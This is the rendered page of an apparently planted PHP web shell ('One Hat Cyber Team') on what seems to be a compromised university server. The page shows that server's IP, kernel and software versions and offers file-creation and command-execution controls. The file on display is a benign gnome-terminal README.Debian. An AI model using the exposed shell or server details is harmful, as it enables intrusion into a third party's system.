One Hat Cyber Team
Your IP :
216.73.216.135
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
backup
/
dad
/
usr
/
share
/
doc
/
gnome-terminal
/
View File Name :
README.Debian
gnome-terminal (3.10.1-2) unstable; urgency=low * To make new tabs opened within Gnome Terminal have the same working directory as the current tab, it is necessary for the shell running in the terminal to cooperate. For this, vte installs a bash shell script that you must source in your ~/.bashrc. For example, you can put this at the end of your ~/.bashrc: [[ -s "/etc/profile.d/vte.sh" ]] && . "/etc/profile.d/vte.sh" -- Fabian Greffrath <fabian+debian@greffrath.com> Tue, 21 Jan 2014 10:02:58 +0100